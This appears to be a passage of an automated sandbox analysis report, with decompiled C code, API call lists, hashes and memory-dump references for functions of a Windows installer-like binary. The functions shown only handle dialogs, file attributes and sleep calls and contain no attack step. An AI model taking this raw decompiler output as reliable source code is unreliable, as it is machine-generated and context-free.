                                                                      • Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                                                      • Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
                                                                      • Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
                                                                      • Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00401595() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E004029FD(0xfffffff0),  *(_t11 - 0x20)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                      0x004015a0
                                                                      0x004015a6
                                                                      0x004015a8
                                                                      0x00402663
                                                                      0x00402663
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 390d4cfc8f115cbb62a09b4aa5a65753adb2130da79b5638ae475f1e2eb5fe67
                                                                      • Instruction ID: 9169326a2aec8439feca5866952fa18bd92df46eb8b4a67c681bb8a0ef40d438
                                                                      • Opcode Fuzzy Hash: 390d4cfc8f115cbb62a09b4aa5a65753adb2130da79b5638ae475f1e2eb5fe67
                                                                      • Instruction Fuzzy Hash: CDD01277B08114E7DB00EBB9AE48A9E73A4FB50325F208637D111F11D0D3B98551EA29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404018 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404018(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x422eb8; // 0x10476
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                      0x00404018
                                                                      0x0040401f
                                                                      0x0040402a
                                                                      0x00000000
                                                                      0x0040402a
                                                                      0x00404030

                                                                      APIs
                                                                      • SendMessageA.USER32(00010476,00000000,00000000,00000000), ref: 0040402A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                                      • Instruction ID: e3adca175a6f9c0685291c658283386376a3739e196c394007d9a93dd14d7098
                                                                      • Opcode Fuzzy Hash: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                                      • Instruction Fuzzy Hash: 23C09B717443007BEA31CB509D49F0777587750741F5544357314F51D4C6B4F410D62D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404001 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404001(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x4236e8, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                      0x0040400f
                                                                      0x00404015

                                                                      APIs
                                                                      • SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                                      • Instruction ID: 72d9328d989bd28a4b04e8d0bfc49dcb98a3c5c69b67aa4312834a6063493829
                                                                      • Opcode Fuzzy Hash: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                                      • Instruction Fuzzy Hash: 54B01235685200BBEE324F00DD0DF497E72F764B02F008034B300240F0C6B300A5DB19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004031CC(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                      0x004031da
                                                                      0x004031e0

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403FEE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403FEE(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x41fcdc, _a4); // executed
				return _t2;
			}




                                                                      0x00403ff8
                                                                      0x00403ffe

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403DCB), ref: 00403FF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                                      • Instruction ID: ba8506c3699760f6a3e6afd6d9d514cfd718e0a5e630d9124f09760ea78015e0
                                                                      • Opcode Fuzzy Hash: e35597bec60e1025900fee06943d1351a87652ae8cbe91aede0566df4541442b
                                                                      • Instruction Fuzzy Hash: 73A01132808200AFCB028B00EE08C8ABF22BBA0300B02C030E200800B0CA320820FF8A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004014D6() {
				long _t2;
				void* _t6;
				void* _t10;

				_t2 = E004029E0(_t6);
				if(_t2 <= 1) {
					_t2 = 1;
				}
				Sleep(_t2); // executed
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t10 - 4));
				return 0;
			}






                                                                      0x004014d7
                                                                      0x004014df
                                                                      0x004014e3
                                                                      0x004014e3
                                                                      0x004014e5
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: cdd133df43bec8c69db6d6e73807644b315103cccf73fc4762beba73f0853dd3
                                                                      • Instruction ID: 8f5234f8cee202cc8b7374a2ab75ea98a04b7977738942e6e00dbb9fbc80be57
                                                                      • Opcode Fuzzy Hash: cdd133df43bec8c69db6d6e73807644b315103cccf73fc4762beba73f0853dd3
                                                                      • Instruction Fuzzy Hash: AED0C7B7B141006BD750E7B86E8545A73E8F75135A7148833D502E1191D17DC9418519
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00404946 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E00404946(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				int _t194;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t277;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				int _t295;
				int _t296;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x423708;
				_t282 = 0;
				_v24 =  *0x4236f0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x4236f9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404894(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x4236f8) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x41fcc4; // 0x0
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x41fcd8; // 0x0
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x41fcc4 = _t282;
								 *0x41fcd8 = _t282;
								 *0x423740 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x4236f9 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404914();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_t194 =  *0x41fcd8; // 0x0
									_v32 = _t194;
									_t195 =  *0x423708;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42370c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x422ebc; // 0x5707f3
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E004047B2(0x3ff, 0xfffffffb, E00404867(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42370c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x41fcd8);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x423740 = _t306;
					 *0x41fcd8 = GlobalAlloc(0x40,  *0x42370c << 2);
					_t252 = LoadBitmapA( *0x4236e0, 0x6e);
					 *0x41fccc =  *0x41fccc | 0xffffffff;
					_t313 = _t252;
					 *0x41fcd4 = SetWindowLongA(_v8, 0xfffffffc, E00404F3D);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x41fcc4 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x41fcc4);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405D00(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00403FCC(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00403FCC(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42370c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
										_t295 =  *0x41fcd8; // 0x0
										 *(_t295 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_t296 =  *0x41fcd8; // 0x0
									_v32 = 1;
									 *(_t296 + _t316 * 4) = _t276;
									_t277 =  *0x41fcd8; // 0x0
									_t284 =  *(_t277 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42370c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404001(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404001(_v12);
								L91:
								return E00404033(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


































































                                                                      0x00404955
                                                                      0x00404966
                                                                      0x0040496b
                                                                      0x00404973
                                                                      0x00404979
                                                                      0x00404981
                                                                      0x0040498f
                                                                      0x00404992
                                                                      0x00404bb2
                                                                      0x00404bb9
                                                                      0x00404bcd
                                                                      0x00404bbb
                                                                      0x00404bbd
                                                                      0x00404bc0
                                                                      0x00404bc1
                                                                      0x00404bc8
                                                                      0x00404bc8
                                                                      0x00404bd9
                                                                      0x00404be7
                                                                      0x00404bea
                                                                      0x00404c00
                                                                      0x00404c75
                                                                      0x00404c78
                                                                      0x00404c7a
                                                                      0x00404c84
                                                                      0x00404c92
                                                                      0x00404c92
                                                                      0x00404c94
                                                                      0x00404c9e
                                                                      0x00404ca4
                                                                      0x00404ca7
                                                                      0x00404caa
                                                                      0x00404cc5
                                                                      0x00404cac
                                                                      0x00404cb6
                                                                      0x00404cb6
                                                                      0x00404caa
                                                                      0x00404c9e
                                                                      0x00000000
                                                                      0x00404c78
                                                                      0x00404c05
                                                                      0x00404c10
                                                                      0x00404c15
                                                                      0x00404c1c
                                                                      0x00404c21
                                                                      0x00404c25
                                                                      0x00404c30
                                                                      0x00404c30
                                                                      0x00404c34
                                                                      0x00404c38
                                                                      0x00404c3c
                                                                      0x00404c4f
                                                                      0x00404c3e
                                                                      0x00404c3e
                                                                      0x00404c45
                                                                      0x00404c4b
                                                                      0x00404c47
                                                                      0x00404c47
                                                                      0x00404c47
                                                                      0x00404c45
                                                                      0x00404c53
                                                                      0x00404c55
                                                                      0x00404c68
                                                                      0x00404c6b
                                                                      0x00404c6e
                                                                      0x00404c6e
                                                                      0x00404c38
                                                                      0x00000000
                                                                      0x00404c25
                                                                      0x00404c07
                                                                      0x00404c0e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404cc8
                                                                      0x00404cc8
                                                                      0x00404ccf
                                                                      0x00404d40
                                                                      0x00404d48
                                                                      0x00404d50
                                                                      0x00404d50
                                                                      0x00404d59
                                                                      0x00404d5b
                                                                      0x00404d62
                                                                      0x00404d65
                                                                      0x00404d65
                                                                      0x00404d6b
                                                                      0x00404d72
                                                                      0x00404d75
                                                                      0x00404d75
                                                                      0x00404d7b
                                                                      0x00404d81
                                                                      0x00404d87
                                                                      0x00404d87
                                                                      0x00404d94
                                                                      0x00404eea
                                                                      0x00404ef1
                                                                      0x00404f0e
                                                                      0x00404f14
                                                                      0x00404f26
                                                                      0x00404f26
                                                                      0x00000000
                                                                      0x00404d9a
                                                                      0x00404d9c
                                                                      0x00404da1
                                                                      0x00404da6
                                                                      0x00404dab
                                                                      0x00404dad
                                                                      0x00404dad
                                                                      0x00404dae
                                                                      0x00404daf
                                                                      0x00404db1
                                                                      0x00404db1
                                                                      0x00404db9
                                                                      0x00404dfa
                                                                      0x00404dfc
                                                                      0x00404e01
                                                                      0x00404e0c
                                                                      0x00404e0f
                                                                      0x00404e14
                                                                      0x00404e1b
                                                                      0x00404e1e
                                                                      0x00404ec0
                                                                      0x00404ec6
                                                                      0x00404ecc
                                                                      0x00404ed4
                                                                      0x00404ee5
                                                                      0x00404ee5
                                                                      0x00000000
                                                                      0x00404ed4
                                                                      0x00404e24
                                                                      0x00404e27
                                                                      0x00404e2d
                                                                      0x00404e32
                                                                      0x00404e34
                                                                      0x00404e36
                                                                      0x00404e3c
                                                                      0x00404e43
                                                                      0x00404e48
                                                                      0x00404e4f
                                                                      0x00404e52
                                                                      0x00404e52
                                                                      0x00404e59
                                                                      0x00404e65
                                                                      0x00404e69
                                                                      0x00404e6b
                                                                      0x00404e6b
                                                                      0x00404e5b
                                                                      0x00404e5d
                                                                      0x00404e5d
                                                                      0x00404e8b
                                                                      0x00404e97
                                                                      0x00404ea6
                                                                      0x00404ea6
                                                                      0x00404ea8
                                                                      0x00404eab
                                                                      0x00404eb4
                                                                      0x00000000
                                                                      0x00404dbb
                                                                      0x00404dc6
                                                                      0x00404dc9
                                                                      0x00404dce
                                                                      0x00404dd0
                                                                      0x00404dd4
                                                                      0x00404de4
                                                                      0x00404dee
                                                                      0x00404df0
                                                                      0x00404df3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404dd6
                                                                      0x00404dd6
                                                                      0x00404ddc
                                                                      0x00404dde
                                                                      0x00404dde
                                                                      0x00404ddf
                                                                      0x00404de0
                                                                      0x00000000
                                                                      0x00404dd6
                                                                      0x00404db9
                                                                      0x00404d94
                                                                      0x00404cd7
                                                                      0x00000000
                                                                      0x00404ced
